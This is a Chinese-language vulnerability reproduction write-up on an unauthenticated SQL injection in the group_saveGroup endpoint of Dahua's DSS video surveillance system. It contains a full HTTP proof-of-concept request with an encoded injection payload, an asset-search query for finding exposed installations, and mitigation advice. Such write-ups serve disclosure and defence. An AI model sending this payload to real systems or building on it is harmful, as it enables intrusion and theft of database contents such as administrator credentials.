大华 DSS 数字监控系统 group_saveGroup SQL 注入漏洞复现

0x00 免责声明

技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x01 产品简介
大华 DSS 数字监控系统是大华开发的一款安防视频监控系统，拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。

0x02 漏洞概述
大华 DSS 数字监控系统 group saveGroup 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

0x03 资产测绘
Hunter:app.name="Dahua 大华 DSS 视频管理系统"

0x04 漏洞复现
PoC：GET /emap/group_saveGroup?groupName=1%27%20and%20md5(1)=%27c4ca4238a0b923820dcc509a6f75849b%27%20and%20%271%27=%271&groupDesc=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

0x05 修复建议
目前已提供解决方案，请关注厂商主页更新:https://ww.dahuatech.com/
临时修复方案:
通过防火墙等安全设备设置访问策略，设置白名单访问。
如非必要，禁止公网访问该系统。